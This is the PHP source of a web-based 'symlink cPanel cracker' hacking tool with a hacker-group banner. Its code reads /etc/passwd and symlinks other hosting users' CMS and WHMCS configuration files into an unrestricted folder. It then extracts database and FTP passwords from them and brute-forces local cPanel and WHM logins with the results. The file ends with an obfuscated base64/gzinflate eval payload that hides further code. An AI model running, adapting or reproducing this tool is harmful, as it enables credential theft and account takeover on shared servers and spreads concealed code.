<?php$head = '<html><head></script><title>--==[[ Fvck!!!,Symlink

1. <?php
2.  
3.  
4. $head = '
5.  
6. <html>
7. <head>
8. </script>
9. <title>--==[[ Fvck!!!,Symlink Based Cpanel Cracker kaMtiEz]]==--</title>
10. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
11.  
12. <STYLE>
13. body {
14. font-family: Tahoma
15. }
16. tr {
17. BORDER: dashed 2px #333;
18. color: #FFF;
19. }
20.  
21. .table1 {
22. BORDER: 0px Black;
23. BACKGROUND-COLOR: Black;
24. color: #FFF;
25. }
26. .td1 {
27. BORDER: 0px;
28. BORDER-COLOR: #333333;
29. font: 7pt Verdana;
30. color: #130ce3;
31. }
32. .tr1 {
33. BORDER: 0px;
34. BORDER-COLOR: #333333;
35. color: #FFF;
36. }
37. table {
38. BORDER: dashed 2px #333;
39. BORDER-COLOR: #333333;
40. BACKGROUND-COLOR: Black;
41. color: #FFF;
42. }
43. input {
44. border : solid 3px ;
45. border-color : #333;
46. BACKGROUND-COLOR: #8a87e6;
47. font: 11pt Verdana;
48. color: #333;
49. }
50. select {
51. BORDER-RIGHT: Black 1px solid;
52. BORDER-TOP: #DF0000 1px solid;
53. BORDER-LEFT: #DF0000 1px solid;
54. BORDER-BOTTOM: Black 1px solid;
55. BORDER-color: #FFF;
56. BACKGROUND-COLOR: Black;
57. font: 8pt Verdana;
58. color: Red;
59. }
60. submit {
61. BORDER: buttonhighlight 2px outset;
62. BACKGROUND-COLOR: Black;
63. width: 30%;
64. color: #FFF;
65. }
66. textarea {
67. border : dashed 1px #333;
68. BACKGROUND-COLOR: Black;
69. font: Fixedsys bold;
70. color: #999;
71. }
72. BODY {
73. SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
74. margin: 1px;
75. color: Red;
76. background-color: Black;
77. }
78. .main {
79. margin : -287px 0px 0px -490px;
80. BORDER: dashed 1px #333;
81. BORDER-COLOR: #333333;
82. }
83. .tt {
84. background-color: Black;
85. }
86.  
87. A:link {
88. COLOR: #8a87e6; TEXT-DECORATION: none
89. }
90. A:visited {
91. COLOR: #8a87e6; TEXT-DECORATION: none
92. }
93. A:hover {
94. color: Red; TEXT-DECORATION: none
95. }
96. A:active {
97. color: Red; TEXT-DECORATION: none
98. }
99. </STYLE>
100. <script language=\'javascript\'>
101. function hide_div(id)
102. {
103. document.getElementById(id).style.display = \'none\';
104. document.cookie=id+\'=0;\';
105. }
106. function show_div(id)
107. {
108. document.getElementById(id).style.display = \'block\';
109. document.cookie=id+\'=1;\';
110. }
111. function change_divst(id)
112. {
113. if (document.getElementById(id).style.display == \'none\')
114. show_div(id);
115. else
116. hide_div(id);
117. }
118. </script>'; ?>
119. <html>
120. <head>
121. <?php
122. echo $head ;
123. echo '
124.  
125. <table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
126.  
127.  
128.  
129. <td width="100%" align=center valign="top" rowspan="1"><font color=#ffffff size=5 face="comic sans ms"><b>--==[[ kaMtiEz ]]==--</font><br>
130. <font color=#ffffff size=5 face="comic sans ms"><b>--==[[ Symlink Based</font><font color=#8a87e6 size=5 face="comic sans ms"><b> CPanel Cracker By</font><font color=#130ce3 size=5 face="comic sans ms"><b> Team GG ]]==--</font> <div class="hedr">
131.  
132. <td height="10" align="left" class="td1"></td></tr><tr><td
133. width="100%" align="center" valign="top" rowspan="1"><font
134. color="red" face="comic sans ms"size="1"><b>
135. <font color=#ffffff>
136. ####################################################</font><font color=#8a87e6>#####################################################</font><font color=#130ce3>####################################################</font><br><font color=#8a87e6>-==[[Greetz to]]==--</font><br><font color=#ffffff>PT. GUDANG GARAM, DJI SAM SOE, DJINGGO, CRICKET, ASBAK, TOSHIBA, AQUA, SMARTFREN, BRI, NOKIA<br>
137.  
138. <font color=#8a87e6>--==[[Dedicated to]]==--</font>
139. <br># My Father and my Ex Teacher #<br><font color=#8a87e6>--==[[Interface Desgined By]]==--</font><br><font color=red>kaMtiEz :D</font><br><font color=#ffffff>
140. ####################################################</font><font color=#8a87e6>#####################################################</font><font color=#130ce3>####################################################</font>
141.  
142. </table>
143. </table> <div align=center><font color=#ffffff font size=5><marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="30" width="70%"><span class="footerlink">Contac Me : Indokamtiez@yahoo.co.id</span></marquee><br></font></div><div align=center><font color=#ffffff font size=4>--==[[ kaMtiEz Featuring PT GUDANG GARAM]]==--</font>
144.  
145. ';
146.  
147. ?>
148. <body bgcolor=black><div align=center><font color=red size=2 face="comic sans ms">
149. <form method=post>
150. <input type=submit name=ini value="Generate PHP.ini" /></form>
151. <?php
152. if(isset($_POST['ini']))
153. {
154.  
155. $r=fopen('php.ini','w');
156. $rr=" disable_functions=none ";
157. fwrite($r,$rr);
158. $link="<a href=php.ini><font color=#8a87e6 size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
159. echo $link;
160.  
161. }
162. ?>
163. <p>\\\\\\\\\\\\\\\\\\\\\\\\ Symlink based cpanel cracking wala jugaad XD ///////////////////////
164. <?php
165. //////////////////////////////////////
166. ///// mass symlink ////////
167. //////////////////////////////////////
168. ?>
169. <form method=post>
170. <input type=submit name="usre" value="click to Extract usernames and mass symlink" /></form>
171.  
172.  
173.  
174.  
175. <?php
176. if(isset($_POST['usre'])){
177. ?><form method=post>
178. <textarea rows=10 cols=30 name=user><?php $users=file("/etc/passwd");
179. foreach($users as $user)
180. {
181. $str=explode(":",$user);
182. echo $str[0]."\n";
183. }
184.  
185. ?></textarea><br><br>
186. <input type=submit name=su value="Klik disini untuk MEMBANTAI" /></form>
187. <?php } ?>
188. <?php
189. error_reporting(0);
190. echo "<font color=red size=2 face=\"comic sans ms\">";
191. if(isset($_POST['su']))
192. {
193.  
194. $dir=mkdir('IcA',0777);
195. $r = " Options all \n DirectoryIndex ICA.html \n Require None \n Satisfy Any";
196. $f = fopen('IcA/.htaccess','w');
197.  
198. fwrite($f,$r);
199. $consym="<a href=IcA/><font color=#8a87e6 size=3 face=\"comic sans ms\">configuration files</font></a>";
200. echo "<br>folder where config files has been symlinked<br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
201.  
202. $usr=explode("\n",$_POST['user']);
203.  
204. foreach($usr as $uss )
205. {
206. $us=trim($uss);
207.  
208. $r="IcA/";
209. symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
210. symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
211. symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
212. symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
213. symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
214. symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
215. symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
216. symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global');
217. symlink('/home/'.$us.'/public_html/inc/config.php',$r.$us.'..inc');
218. symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
219. symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'..Settings');
220. symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites');
221. symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm');
222. symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
223. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
224. symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM');
225. symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc');
226. symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs');
227. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp');
228. symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli');
229. symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl');
230. symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL');
231. symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl');
232. symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup');
233. symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill');
234. symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf');
235. }
236. }
237. ?>
238. <?php
239. //////////////////////////////////////
240. /////password grabbing section////////
241. //////////////////////////////////////
242. ?>
243.  
244. <form method=post>
245. <input type=submit name=select value="Memilih Config Untuk Di Tusbol">
246. </form>
247.  
248. <?php
249. if(isset($_POST['select']))
250. {
251. ?><div align=center>
252. <font color=#ffffff size=2 face="comic sans ms">Cek Config Untuk Mencari Password <table width=30% >
253. <tr>
254. <td align=right width=50%>
255. <br>
256. <font color=red size=3>
257. wordpress => <br>
258. joomla => <br>
259. whmcs =><br>
260. VBulletin => <br>
261. unknown => <br>
262. ftp(joomla) => <br>
263. <br>
264. </td>
265. <td align=left >
266. <form method="post"><br>
267. <input type="checkbox" name="config[]" value="wp"><br>
268. <input type="checkbox" name="config[]" value="joomla"><br>
269. <input type="checkbox" name="config[]" value="whmcs"><br>
270. <input type="checkbox" name="config[]" value="vb"><br>
271. <input type="checkbox" name="config[]" value="other"><br>
272. <input type="checkbox" name="config[]" value="jftp"><br>
273. </td>
274. </tr>
275. </table><br>
276. <input type="submit" name=sm value="lanjutkan untuk membantai" />
277. </form>
278. <p>
279. <?php
280. }
281. ?>
282. <?php
283.  
284. set_time_limit(0);
285.  
286. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
287. {
288.  
289. $ar0=explode($marqueurDebutLien, $text);
290. $ar1=explode($marqueurFinLien, $ar0[1]);
291. $ar=trim($ar1[0]);
292. return $ar;
293. }
294.  
295. function data($lu)
296. {
297. $ch = curl_init();
298.  
299. curl_setopt($ch, CURLOPT_URL, $lu);
300. curl_setopt($ch, CURLOPT_HEADER, 1);
301. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
302. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
303. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
304. $result['EXE'] = curl_exec($ch);
305. curl_close($ch);
306. return $result['EXE'];
307.  
308. }
309.  
310.  
311.  
312. if(isset($_POST['sm']))
313. {
314. ////////////////
315. ///file opener//
316. ////////////////
317. $ffile=fopen('r.txt','a+');
318.  
319. //////////////////////
320. //symlink directory///
321. //////////////////////
322. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/IcA/";
323. $re=$r;
324.  
325. ////////////////////////
326. ///username extractor///
327. ////////////////////////
328. if(!empty($_POST['config']))
329. {
330.  
331. $users=file("/etc/passwd");
332. foreach($users as $user)
333. {
334.  
335. $str=explode(":",$user);
336. $usersss=$str[0];
337.  
338.  
339.  
340. foreach($_POST['config'] as $check)
341. {
342.  
343. ////////////////
344. ///wordpress////
345. ////////////////
346. if($check == "wp")
347. {
348. $wpc=array("..wp-config","..word-wp","..wpblog");
349.  
350. foreach($wpc as $wpcon)
351. {
352. $finalurl=$re.$usersss.$wpcon;
353. $content=data($finalurl);
354.  
355. if($content && preg_match('/table_prefix/i',$content))
356. {
357.  
358. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is wordpress </font></td></tr></table>";
359.  
360. echo "mysql server password ==> ". $dbp=entre2v2($content,"DB_PASSWORD', '","');");
361. if(!empty($dbp))
362. $pass=$dbp."\n";
363. fwrite($ffile,$pass);
364.  
365. }
366.  
367.  
368.  
369. }
370.  
371. }
372. ////////////
373. // joomla //
374. ////////////
375.  
376.  
377. if($check == "joomla")
378. {
379. $joomlac=array("..joomla-or-whmcs","..joomla");
380. foreach($joomlac as $joomlacon)
381. {
382. $finalurl=$re.$usersss.$joomlacon;
383. $content=data($finalurl);
384.  
385. if($content && preg_match('/dbprefix/i',$content))
386. {
387.  
388. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is joomla </font></td></tr></table>";
389.  
390. echo "mysql server password ==> ". $dbp=entre2v2($content,"password = '","';");
391. if(!empty($dbp))
392. $pass=$dbp."\n";
393. fwrite($ffile,$pass);
394.  
395. }
396.  
397.  
398.  
399. }
400.  
401.  
402. }
403. ///////////////
404. ////whmcs /////
405. ///////////////
406.  
407. if($check == "whmcs")
408. {
409. $whmcsc=array("..joomla-or-whmcs","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill");
410. foreach($whmcsc as $whmcscon)
411. {
412. $finalurl=$re.$usersss.$whmcscon;
413. $content=data($finalurl);
414.  
415. if($content && preg_match('/cc_encryption_hash/i',$content))
416. {
417.  
418. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website whmcs bhaiyu xD </font></td></tr></table>";
419.  
420. echo "mysql server password ==> ". $dbp=entre2v2($content,"db_password = '","';");
421. if(!empty($dbp))
422. $pass=$dbp."\n";
423. fwrite($ffile,$pass);
424.  
425. }
426. }
427. }
428. /////////////////
429. ///VBulletin////
430. ////////////////
431. if($check == "vb")
432. {
433. $vbc=array("..vbinc","..vb");
434. foreach($vbc as $vbcon)
435. {
436. $finalurl=$re.$usersss.$vbcon;
437. $content=data($finalurl);
438.  
439. if($content && preg_match('/admincpdir/i',$content))
440. {
441.  
442. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is vbulletin </font></td></tr></table>";
443.  
444. echo "mysql server password ==> ". $dbp=entre2v2($content,"password'] = '","';");
445. if(!empty($dbp))
446. $pass=$dbp."\n";
447. fwrite($ffile,$pass);
448.  
449. }
450. }
451. }
452. /////////////////
453. ///joomla ftp////
454. ////////////////
455. if($check == "jftp")
456. {
457. $joomlac=array("..joomla-or-whmcs","..joomla");
458. foreach($joomlac as $joomlacon)
459. {
460. $finalurl=$re.$usersss.$joomlacon;
461. $content=data($finalurl);
462.  
463. if($content && preg_match('/dbprefix/i',$content))
464. {
465.  
466. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is joomla </font></td></tr></table>";
467.  
468. $dbp=entre2v2($content,"ftp_pass = '","';");
469. $dbu=entre2v2($content,"ftp_user = '","';");
470. if(!empty($dbp))
471. echo "ftp user is ==> ". $dbu=entre2v2($content,"ftp_user = '","';");
472. echo "<br>ftp password is ==> ". $dbp=entre2v2($content,"ftp_pass = '","';");
473.  
474. $pass=$dbu." ".$dbp."\n";
475. fwrite($ffile,$pass);
476.  
477. }
478.  
479.  
480.  
481. }
482.  
483.  
484. }
485. ////////////////
486. // other cms ///
487. ///////////////
488. if($check == "other")
489. {
490. $otherc=array("..config","..admin-conf");
491. foreach($otherc as $othercon)
492. {
493. $finalurl=$re.$usersss.$othercon;
494. $content=data($finalurl);
495.  
496. if($content && preg_match('/DB_DATABASE/i',$content))
497. {
498.  
499. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms for user $usersss </font></td></tr></table>";
500.  
501. echo "mysql server password ==> ". $dbp=entre2v2($content,"DB_PASSWORD', '","');");
502. if(!empty($dbp))
503. $pass=$dbp."\n";
504. fwrite($ffile,$pass);
505.  
506. }
507. elseif($content && preg_match('/dbpass/i',$content))
508. {
509.  
510. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
511.  
512. echo $db=entre2v2($content,"dbpass = '","';");
513. if(!empty($db))
514. $pass=$db."\n";
515. fwrite($ffile,$pass);
516. }
517. elseif($content && preg_match('/dbpass/i',$content))
518. {
519.  
520. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms of user $usersss </font></td></tr></table>";
521.  
522. echo $db=entre2v2($content,"dbpass = '","';");
523. if(!empty($db))
524. $pass=$db."\n";
525. fwrite($ffile,$pass);
526.  
527. }
528. elseif($content && preg_match('/dbpass/i',$content))
529. {
530.  
531. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
532.  
533. echo $db=entre2v2($content,"dbpass = \"","\";");
534. if(!empty($db))
535. $pass=$db."\n";
536. fwrite($ffile,$pass);
537. }
538.  
539.  
540.  
541.  
542. }
543. }
544.  
545.  
546.  
547. }
548. }
549. }
550. else{
551. echo "<p>aapne pani jayada pee liya h =)), aap nashe may ho bhaiyu, please checkmark config files :P ";
552. }
553.  
554. }
555. ?>
556.  
557.  
558.  
559. <?php
560. /////////////////////////////////
561. ///// cpanel cracker ///////
562. /////////////////////////////////
563. ?>
564.  
565.  
566. <form method=post>
567. <input type=submit name=cpanel value="Auto username/password loading cpanel cracker"><p>
568. <?php
569.  
570. if(isset($_POST['cpanel']))
571. {
572. ?>
573. <form method=post><div align=center><table>
574. want to brute=><select name="op"> <option name="op" value="cp">CPanel</option>
575. <option name="op" value="whm">WHMPanel</option></table><p>
576. <textarea style="background:black;color:#8a87e6" rows=20 cols=25 name=usernames ><?php $users=file("/etc/passwd");
577. foreach($users as $user)
578. {
579. $str=explode(":",$user);
580. echo $str[0]."\n";
581. }
582.  
583. ?></textarea><textarea style="background:black;color:#8a87e6" rows=20 cols=25 name=passwords >
584. <?php
585.  
586. $d=getcwd()."/r.txt";
587. $pf=file($d);
588. foreach($pf as $rt)
589. {
590. $str=explode('\n',$rt);
591. echo trim($str[0])."\n";
592. } ?></textarea><p>
593. <input type=submit name=cpanelcracking value="tonjok q=_=p"></form>
594. <?php
595. }
596. ?>
597.  
598.  
599.  
600.  
601. <?php
602. error_reporting(0);
603. $connect_timeout=5;
604. set_time_limit(0);
605.  
606. $userl=$_POST['usernames'];
607. $passl=$_POST['passwords'];
608. $attack=$_POST['op'];
609. $target = "localhost";
610.  
611. if(isset($_POST['cpanelcracking']))
612. {
613. if($userl!=="" && $passl!=="")
614. {
615. if($_POST["op"]=="cp")
616. {
617. $cracked=$_POST['crack'];
618. @fopen($cracked,'a');
619. echo "bhai ji ^_^ ......now we are attacking cpanels....please wait till the end of process \n";
620.  
621.  
622. }
623. elseif($_POST["op"]=="whm")
624. {
625. @fopen($cracked,'a');
626. echo "bhai ji ^_^ ......now we are attacking WHM panel....please wait till the end of process";
627.  
628. }
629.  
630. function cpanel($host,$user,$pass,$timeout){
631. $ch = curl_init();
632. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
633. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
634. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
635. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
636. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
637. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
638. $data = curl_exec($ch);
639. if ( curl_errno($ch) == 0 ){
640. echo "<table width=100% ><tr><td align=center><b><font color=#8a87e6 size=2>==================================</font><font color=red size=2> $user </font><font color=#8a87e6 size=2>cracked with </font><font color=red size=2> $pass </font> <font color=#8a87e6 size=2>==================================</font></b></td></tr></table>";
641.  
642.  
643. }
644.  
645. curl_close($ch);}
646.  
647. $userlist=explode("\n",$userl);
648. $passlist=explode("\n",$passl);
649.  
650. if ($attack == "cp")
651. {
652. foreach ($userlist as $user) {
653. echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user </font></td></tr></table>";
654. $finaluser = trim($user);
655. foreach ($passlist as $password ) {
656. $finalpass = trim($password);
657.  
658.  
659. cpanel($target,$finaluser,$finalpass,$connect_timeout);
660.  
661. }
662. }
663.  
664. }
665.  
666. function whm($host,$user,$pass,$timeout){
667. $ch = curl_init();
668. curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
669. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
670. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
671. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
672. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
673. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
674. $data = curl_exec($ch);
675. if ( curl_errno($ch) == 0 ){
676. echo "<table width=100% ><tr><td align=center><b><font color=#8a87e6 size=2>==================================</font><font color=red size=2> $user </font><font color=#8a87e6 size=2>cracked with </font><font color=red size=2> $pass </font> <font color=#8a87e6 size=2>==================================</font></b></td></tr></table>";
677.  
678.  
679.  
680.  
681. }
682.  
683.  
684. curl_close($ch);}
685. $userlist=explode("\n",$userl);
686. $passlist=explode("\n",$passl);
687.  
688. if ($attack == "whm")
689. {
690. foreach ($userlist as $user) {
691. echo "<table width=80% ><tr><td align=center><b><font color=#8a87e6 size=2>user under attack is $user </font></td></tr></table>";
692. $finaluser = trim($user);
693. foreach ($passlist as $password ) {
694. $finalpass = trim($password);
695.  
696. whm($target,$finaluser,$finalpass,$connect_timeout);
697. }
698. }
699. }
700. }
701. elseif($userl=="")
702. {
703. echo "what are you doing bhai ji :( , you have left userlist field empty";
704.  
705. }
706. elseif($passl=="")
707. {
708.  
709. echo "bhai ji :( ... please put passwords in paasword list field";
710. }
711. }
712. ?>
713. <?php
714. $x='AkbetSDlUI~ULLJVqNFiFoRh4gsBKJYlCyJoPkWAWc6pkXOKpry5nXi6JeAS3tEzJ7yLIvs0K3ETIrsKQFNzM3EzRaw4tDJAHBIbEulIMTZ2gFr6hEs~eEfAhEiHqHdQuGWQuGc8qIGgyQVu4VRr0UTsF8CiogMKVBbVNx8SJL14';$b=strrev('edoced_46esab');$g=$b('Z3ppbmZsYXRl');$r=$b('c3RyX3JlcGxhY2U=');eval($g($b(strrev($r($b('fg=='),$b('Lw=='),$x)))));$xx='41LJS8xNVbBVKMgoiC8FsTU0rRV4uVQygGIq8cGuQWGuQdHqHiEhAfEe~sEh6rFg2ZTMIluEbIBHAJDt4waRzE3MzNFQKsrITE3K0svILy7JzEt3SAeJ6iXn5yrpKOXkp6cWAWkPoJyClYJKBsg4hRoFiFNqVJLLU~IUlDStebkA';
715. ?>